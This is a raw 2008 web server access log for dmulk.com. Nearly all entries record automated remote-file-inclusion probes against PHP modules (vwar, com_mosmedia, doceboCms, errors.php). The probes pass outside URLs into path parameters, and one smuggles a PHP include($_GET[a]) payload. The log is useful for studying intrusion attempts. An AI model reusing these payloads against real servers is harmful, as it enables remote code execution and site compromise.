66.249.67.80 - - [24/Jul/2008:07:14:41 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0117.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" "dmulk.com"
80.67.17.51 - - [24/Jul/2008:07:14:47 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.17.51 - - [24/Jul/2008:07:14:47 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.17.51 - - [24/Jul/2008:07:14:48 -0700] "GET //index.php?DOCUMENT_ROOT=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?? HTTP/1.1" 200 18479 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:14:51 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:14:51 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:07:15:04 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:07:15:04 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:07:15:04 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:15:12 -0700] "GET /logs/access_071213.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:15:16 -0700] "GET /logs/access_071213.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:15:17 -0700] "GET /logs/access_071213.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.108.67.119 - - [24/Jul/2008:07:15:17 -0700] "GET /logs/access.log/errors.php?error=http://www.freewebs.com/albgroup/1d/rid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.119 - - [24/Jul/2008:07:15:17 -0700] "GET /errors.php?error=http://www.freewebs.com/albgroup/1d/rid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.245.166.92 - - [24/Jul/2008:07:15:18 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.veneno.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.119 - - [24/Jul/2008:07:15:18 -0700] "GET /logs/errors.php?error=http://www.freewebs.com/albgroup/1d/rid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.245.166.92 - - [24/Jul/2008:07:15:18 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.veneno.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [24/Jul/2008:07:15:18 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.veneno.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:15:21 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:15:21 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:15:21 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:15:21 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:15:21 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:15:21 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:15:22 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:07:15:25 -0700] "GET /logs/access_071213.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:15:26 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:15:26 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.75.193.70 - - [24/Jul/2008:07:15:35 -0700] "GET /logs//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://wearecanadians.com/ray/modules/global/install/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [24/Jul/2008:07:15:35 -0700] "GET //administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://wearecanadians.com/ray/modules/global/install/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [24/Jul/2008:07:15:35 -0700] "GET /logs/access_080303.log//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://wearecanadians.com/ray/modules/global/install/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.10.95 - - [24/Jul/2008:07:15:52 -0700] "GET //modules/xfsection/modify.php?dir_module=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.10.95 - - [24/Jul/2008:07:15:54 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.10.95 - - [24/Jul/2008:07:15:58 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:07:16:09 -0700] "GET /logs/access_071213.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:16:10 -0700] "GET /logs/access_071213.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:16:13 -0700] "GET /logs/access_071213.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.10.95 - - [24/Jul/2008:07:16:14 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:16:16 -0700] "GET /logs/access_071213.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:16:18 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:16:18 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
66.249.67.80 - - [24/Jul/2008:07:16:22 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0032.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" "dmulk.com"
58.227.193.211 - - [24/Jul/2008:07:16:40 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:16:42 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:16:42 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.22.128 - - [24/Jul/2008:07:16:43 -0700] "GET /logs/index.php?option=com_cbcontact&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.128 - - [24/Jul/2008:07:16:45 -0700] "GET /index.php?option=com_cbcontact&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 200 18555 "-" "libwww-perl/5.812" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:16:51 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:07:16:57 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.245.166.92 - - [24/Jul/2008:07:17:07 -0700] "GET /logs/access_080329.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.veneno.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:17:33 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:17:33 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:17:34 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:17:35 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:17:36 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:17:36 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:17:38 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:17:39 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:17:40 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:17:48 -0700] "GET /convert/mvcw.php?vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:17:48 -0700] "GET /convert/mvcw.php?vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:17:49 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:17:49 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
201.130.79.130 - - [24/Jul/2008:07:17:56 -0700] "GET /convert/mvcw.php?vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.221.143.111 - - [24/Jul/2008:07:18:19 -0700] "GET /logs/access_071230.log//convert/mvcw.php?step=1&vwar_root=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [24/Jul/2008:07:18:19 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:07:18:20 -0700] "GET /convert/mvcw.php?vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.221.143.111 - - [24/Jul/2008:07:18:20 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:19:19 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:19:19 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:19:38 -0700] "GET /logs/access_071213.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:19:38 -0700] "GET /logs/access_071213.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:19:38 -0700] "GET /logs/access_071213.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.119 - - [24/Jul/2008:07:19:53 -0700] "GET /errors.php?error=http://www.freewebs.com/albgroup/1d/rid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.97.132.101 - - [24/Jul/2008:07:20:00 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.proostjes.be/calendar/help01.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [24/Jul/2008:07:20:01 -0700] "GET /logs/?sourcedir=http://www.proostjes.be/calendar/help01.txt????? HTTP/1.0" 200 57407 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [24/Jul/2008:07:20:01 -0700] "GET /?sourcedir=http://www.proostjes.be/calendar/help01.txt????? HTTP/1.0" 200 18407 "-" "libwww-perl/5.53" "www.dmulk.com"
202.221.143.111 - - [24/Jul/2008:07:20:44 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:20:58 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:20:58 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
66.230.197.245 - - [24/Jul/2008:07:20:59 -0700] "GET /logs/index.php?option=com_cbcontact&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [24/Jul/2008:07:21:01 -0700] "GET /index.php?option=com_cbcontact&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 200 18555 "-" "libwww-perl/5.810" "www.dmulk.com"
217.75.193.70 - - [24/Jul/2008:07:21:28 -0700] "GET /logs/access_080123.log//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://wearecanadians.com/ray/modules/global/install/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [24/Jul/2008:07:21:28 -0700] "GET /logs/access_080124.log//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://wearecanadians.com/ray/modules/global/install/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [24/Jul/2008:07:21:35 -0700] "GET /logs/access_080125.log//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://wearecanadians.com/ray/modules/global/install/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [24/Jul/2008:07:21:44 -0700] "GET /logs/access_080204.log//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://wearecanadians.com/ray/modules/global/install/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:22:29 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:22:29 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
89.108.66.136 - - [24/Jul/2008:07:22:35 -0700] "GET //components/errors.php?error=http://sibtorg.com/shop/usr/extensions/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.189.128.52 - - [24/Jul/2008:07:23:00 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.189.128.52 - - [24/Jul/2008:07:23:00 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.189.128.52 - - [24/Jul/2008:07:23:00 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.189.128.52 - - [24/Jul/2008:07:23:00 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.189.128.52 - - [24/Jul/2008:07:23:01 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.189.128.52 - - [24/Jul/2008:07:23:01 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.97.132.101 - - [24/Jul/2008:07:23:10 -0700] "GET /logs/access_080218.log/?sourcedir=http://www.proostjes.be/calendar/help01.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.6.18.246 - - [24/Jul/2008:07:23:33 -0700] "GET /bikes/?S=A HTTP/1.0" 200 2719 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:24:03 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:07:24:03 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:07:24:11 -0700] "GET /errors.php?error=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.85.89.114 - - [24/Jul/2008:07:24:14 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.allfreeipodsex.com/ipod.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:07:24:14 -0700] "GET /logs/access.log/errors.php?error=http://www.kke.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:07:24:15 -0700] "GET /errors.php?error=http://www.kke.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [24/Jul/2008:07:24:17 -0700] "GET /logs/errors.php?error=http://www.kke.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.80 - - [24/Jul/2008:07:24:19 -0700] "GET /blog/?pageid=17&show=gallery&nggpage=3 HTTP/1.1" 200 47020 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:24:24 -0700] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.110.178.66 - - [24/Jul/2008:07:24:24 -0700] "GET /logs/access_080329.log//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.lametaradio.com/scripts/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
220.110.178.66 - - [24/Jul/2008:07:24:24 -0700] "GET //administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.lametaradio.com/scripts/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
220.110.178.66 - - [24/Jul/2008:07:24:24 -0700] "GET /logs//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.lametaradio.com/scripts/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
220.110.178.66 - - [24/Jul/2008:07:24:24 -0700] "GET /logs/access_080315.log//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://www.lametaradio.com/scripts/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:24:24 -0700] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:24:24 -0700] "GET /convert/mvcw.php?vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:24:24 -0700] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:24:24 -0700] "GET /convert/mvcw.php?vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:24:24 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:24:25 -0700] "GET /convert/mvcw.php?vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
